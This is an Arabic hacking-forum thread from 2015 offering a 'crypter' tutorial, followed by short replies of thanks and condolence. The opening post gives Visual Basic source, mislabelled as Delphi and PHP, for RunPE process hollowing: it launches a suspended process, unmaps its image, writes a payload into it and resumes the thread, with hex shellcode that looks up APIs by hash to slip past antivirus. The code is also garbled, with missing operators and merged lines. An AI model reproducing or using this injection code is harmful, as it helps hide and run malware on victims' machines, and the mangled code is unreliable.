1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

[ شرح ] التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

الموضوع في 'حماية الأجهزة' بواسطة !»°بہًكہًر الہًعہًراقہًي°«!, بتاريخ ‏21 ابريل 2015.

كاتب الموضوع : !»°بہًكہًر الہًعہًراقہًي°«! المشاهدات : 946 الردود : 30 ‏21 ابريل 2015
حالة الموضوع:
مغلق
  1. غير متصل

    !»°بہًكہًر الہًعہًراقہًي°«! أداري أقسام حماية الأجهزة

    عضو منذ:
    ‏7 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,478
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    28

    [​IMG]
    كيف الحال اعضاء وزوار عراق تيم انشاء تكونوا بصحه وسلامه

    ------------
    [​IMG]
    شرح اليوم التشفير بالدلفي بطريقه جديده حصريا على ارض الابداع عراق تيم


    التشفير عن طريق استخدام
    RunPe + Invoke


    طبعا لم يتسنى لي وقت لاعمل فديو لاني مستعجل انو هذا اخر موضوع لي لحد شهر الثامن بسب الامتحانات


    اتركم مع الاكواد


    الكود
    كود PHP:
    Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As CurrencyOptional ByVal lP1 As LongOptional ByVal lP2 As LongOptional ByVal lP3 As LongOptional ByVal lP4 As Long) As LongDeclare Function ExeThunk Lib "user32" Alias "CallWindowProcW" (ByVal Address As AnyOptional ByVal Param1 As LongOptional ByVal Param2 As LongOptional ByVal Param3 As LongOptional ByVal Param4 As Long) As LongDeclare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef A As AnyOptional ByVal B As Long 1Optional ByVal c As Long 1) As LongPrivate ASM_GETAPIPTR(170)            As BytePrivate ASM_CALLCODE(255)              As BytePrivate sMEMORY(40)                    As BytePrivate sVALUE                        As BytePrivate IMAGE_DOS_HEADER(65)          As BytePrivate IMAGE_NT_HEADERS(256)          As BytePrivate IMAGE_SECTION_HEADER(60)      As BytePrivate PROCESS_INFORMATION(44)        As BytePrivate tCONTEXT(210)                  As BytePrivate STARTUPINFO(16)                As LongPrivate sParams                        As LongPrivate ImageBase                      As LongPrivate hProcess                      As LongPrivate hThread                        As LongPrivate SizeOfImage                    As LongPrivate SizeOfHeaders                  As LongPrivate sEntryPoint                    As LongPrivate VirtualAddress                As LongPrivate sRawDataPoint                  As LongPrivate sRawData                      As LongPrivate Ebx                            As LongPrivate D                              As LongPrivate Z                              As LongPrivate vItem                          As VariantPrivate sSection                      As Integer

    Public Function sInject(ByVal sHost As StringByRef sBytes() As Byte)

    For 
    Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1_&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
    sMEMORY(Z) = vItem
    1
    sVALUE 
    200 48
    Next

    Call MoveMemory
    (sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
    Call MoveMemory(sMulDiv(tCONTEXT(0)), sMulDiv(&H10007), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(0)), sMulDiv(sBytes(0)), &H72)
    Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(0)), sMulDiv(sBytes(sParams)), 256)
    Call MoveMemory(sMulDiv(ImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
    Call Invoke("KERNEL32""CreateProcessW"0StrPtr(sHost), 00, &H1, &H400sMulDiv(STARTUPINFO(0)), sMulDiv(PROCESS_INFORMATION(0)))
    Call MoveMemory(sMulDiv(hProcess), sMulDiv(PROCESS_INFORMATION(0)), &H1 + &H3)
    Call MoveMemory(sMulDiv(hThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
    Call Invoke("NTDLL""NtUnmapViewOfSection"hProcessImageBase)
    Call Invoke("KERNEL32""VirtualAllocEx"hProcessImageBaseSizeOfImage, &H3000&, &H40)
    Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessImageBasesMulDiv(sBytes(0)), SizeOfHeadersCLng("0"))
    For 
    0 To sSection 1
    Call MoveMemory
    (sMulDiv(IMAGE_SECTION_HEADER(0)), sMulDiv(sBytes(sParams sVALUE 40& * D)), &H64)
    Call MoveMemory(sMulDiv(VirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
    Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessImageBase VirtualAddresssMulDiv(sBytes(sRawDataPoint)), sRawDataCLng("0"))
    Next
    Call Invoke
    ("NTDLL""NtGetContextThread"hThreadsMulDiv(tCONTEXT(CLng("0"))))          Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessEbx + &H4 + &H1 + &H3sMulDiv(VirtualAddress), &H1 + &H3 + &H2CLng("0"))
    Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(ImageBase sEntryPoint), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sParams), sMulDiv(tCONTEXT(176)), &H5)
    Call Invoke("NTDLL""NtSetContextThread"hThreadsMulDiv(tCONTEXT(0)))
    Call Invoke("NTDLL""NtResumeThread"hThreadCLng("0"))
    End Function
    Public 
    Sub MoveMemory(ByVal lpDest As LongByVal lpSource As LongByVal cBytes As Long)      ExeThunk sMulDiv(sMEMORY(0)), lpDestlpSourcecBytesCLng("0")  End Sub
    Function Invoke(ByVal sDLL As StringhHash As StringParamArray vParams() As Variant) As Long
    On Error Resume NextDim vItem                      
    As VariantDim sThunk                      As String
    Call PutThunk
    (THUNK_GETAPIPTRASM_GETAPIPTR)
    For 
    Each vItem In vParamssThunk "68" GetLng(vItem) & sThunkNext vItem
    Call PutThunk
    (sThunk "B8" GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _StrPtr(sDLL), gHash(hHash))) & "FFD0C3" sThunkASM_CALLCODE)
    Invoke ExeThunk(VarPtr(ASM_CALLCODE(0)))

    End Function
    Private Function 
    gHash(strHash) As LongOn Error Resume Next
    Dim i          
    As LongDim lResult    As Long
    For 1 To Len(strHash)lResult CallThunk8(-439163333029263.6533@, lResult)lResult lResult Asc(Mid(strHashi1))Next igHash "&H" String(Len(Hex(lResult)), "0") & Hex(lResult)

    End Function
    Private Function 
    GetLng(ByVal lLng As Long) As StringOn Error Resume NextDim lTMP                        As LonglTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000' by Mike D SuttonIf (lLng And &H80&) Then lTMP = lTMP Or &H80000000GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)End Function
    Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)On Error Resume NextDim i                          As LongFor i = 0 To Len(sThunk) - 1 Step 2bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))Next iEnd Sub
    Function THUNK_GETAPIPTR() As StringTHUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"End Function
    الى هنا انتهى الشرح انتمى ان يكون نال اعجباكم دعواتكم بالنجاح لنعود اليكم بمواضيع جديده وحصريا على عراق تيم
    اتركم براعيه الله
    [​IMG]
    امير ايكل


    المعاقب الصدري


    ملخد هكسور


    محمد العراقي


    وفي الاخير رحم الله من قراء سوره الفاتحه على روح اخي وحبيبي علي الصقور

     


    جاري تحميل الصفحة...
  2. غير متصل

    Unico Nico
    rank
    Developer

    عضو منذ:
    ‏7 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    يعطيك الف عافية #
     


  3. غير متصل

    لعنة الهكرز
    rank
    Developer

    عضو منذ:
    ‏12 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    تسلم يدك شاكرين مجهودك​
     


  4. غير متصل

    Mohmaed .:: super ::.
    V • I • P

    عضو منذ:
    ‏12 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    951
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    24

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    عشت حبيبي ستمر الله يرحمك عزيزي علاوي
     


  5. غير متصل

    !»°بہًكہًر الہًعہًراقہًي°«! أداري أقسام حماية الأجهزة

    عضو منذ:
    ‏7 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,478
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    28

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    نورتو اصدقائي تحياتي للجميع
     


  6. غير متصل

    علي الواسطي
    DeveloPer Plus

    عضو منذ:
    ‏13 يناير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    مببببببدع عاشت ايدك
    .
    .
    .
    الله يرحمه ويدخله فسيح جناته :(
     


  7. غير متصل

    !»°بہًكہًر الہًعہًراقہًي°«! أداري أقسام حماية الأجهزة

    عضو منذ:
    ‏7 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,478
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    28


    تسلم خويه ويرحم اموات المسلمين جميعا
     


  8. غير متصل

    Girl - SilenT <span style="font-weight: bold; text-shadow: #BBBB
    مشرفات المنتدى

    عضو منذ:
    ‏1 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    عاشت ايدك ع موضوع استمر يامبدع


    تحياتي


    :{1!}:
     


  9. غير متصل

    Someone
    rank
    Developer

    عضو منذ:
    ‏15 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    هذا مو دلفي
    oh god why.
     


  10. غير متصل

    !»°بہًكہًر الہًعہًراقہًي°«! أداري أقسام حماية الأجهزة

    عضو منذ:
    ‏7 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,478
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    28

    نورتي الموضوع اختي
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...